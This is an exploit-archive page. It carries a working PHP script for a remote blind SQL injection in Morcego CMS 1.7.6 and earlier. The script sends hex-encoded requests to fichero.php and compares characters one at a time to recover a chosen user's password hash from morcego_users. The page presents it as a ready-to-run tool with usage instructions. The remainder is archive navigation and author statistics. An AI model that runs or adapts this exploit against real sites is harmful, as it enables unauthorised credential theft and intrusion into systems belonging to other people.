Morcego CMS 1.7.6 SQL Injection

Morcego CMS 1.7.6 SQL Injection: Posted Jul 13, 2009; Authored by darkjoker | Site darkjokerside.altervista.org; Morcego CMS versions 1.7.6 and below remote blind SQL injection exploit.; tags | exploit, remote, sql injection; SHA-256 | 90e14e81b7dcc45d5f8258ae016865cfc72dccb68be1230e2013f4022d132dc4; Download | Favorite | View

Morcego CMS 1.7.6 SQL Injection

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
-           __           __     _       __                -
+      ____/ /___ ______/ /__  (_)___  / /_____  _____    +
-     / __  / __ `/ ___/ //_/ / / __ \/ //_/ _ \/ ___/    -
+    / /_/ / /_/ / /  / ,<   / / /_/ / ,< /  __/ /        +
-    \__,_/\__,_/_/  /_/|_|_/ /\____/_/|_|\___/_/         -
+                        /___/                            +
-                                                         -
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

<?php

function usage () {
  exit (  "\n".
    "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n".
    "-                                                                   -\n".
    "+ Morcego CMS <= 1.7.6 Blind SQL Injection Exploit                  +\n".
    "- Author  : darkjoker                                               -\n".
    "+ Site    : https://darkjoker.net23.net                              +\n".
          "- Download: https://sourceforge.net/projects/morcegocms/             -\n".
    "+ Usage   : php xpl.php <hostname> <path> <username>                +\n".
    "- Ex.     : php xpl.php localhost /MorcegoCMS/ root                 -\n".
    "+                                                                   +\n".
    "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n".
    "\n");
}

function hex ($string) {
  $i=0;
  while ($i<strlen($string)) 
    $hex .= "%".dechex(ord($string[$i++]));
  return $hex;
}

function check_chr ($hostname, $path, $pos, $char, $username) {
  $char = ord ($char);
  if (!($sp = fsockopen ($hostname, 80, $errno, $errstr, 5)))
    die ("[-] Unknow hostname.");
  $query = hex ("1' OR ASCII(SUBSTRING((SELECT password FROM morcego_users WHERE username='{$username}'),{$pos},1))={$char}-- ");
  $request = "GET {$path}fichero.php?{$query} HTTP/1.1\r\n".
       "Host: {$hostname}\r\n".
       "Connection: Close\r\n\r\n";
  fputs ($sp, $request);
  while (!feof ($sp))
    $reply .= fgets ($sp, 1024);
  fclose ($sp);
  if (preg_match ("|Page not found|", $reply))
    return false;
  else
    return true;
}

if ($argc != 4)
  usage ();
$hostname = $argv [1];
$path = $argv [2];
$username = $argv [3];
$array = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
echo "[+] Password (hash): ";
for ($i=0,$d=1;$i<strlen($array);) {
  if (check_chr ($hostname, $path, $d, $array [$i], $username)) {
    echo $array [$i];
    $i=0;
    $d++;
  }
  else
    $i++;
}
echo "\n";

Top Authors In Last 30 Days

Red Hat 272 files
Ubuntu 56 files
Debian 19 files
LiquidWorm 18 files
Apple 9 files
Gentoo 5 files
Google Security Research 3 files
Chokri Hammedi 3 files
Alter Prime 3 files
Valentin Lobstein 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,937)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,337)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,979)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

Morcego CMS 1.7.6 SQL Injection

Morcego CMS 1.7.6 SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Morcego CMS 1.7.6 SQL Injection

Share This

Morcego CMS 1.7.6 SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems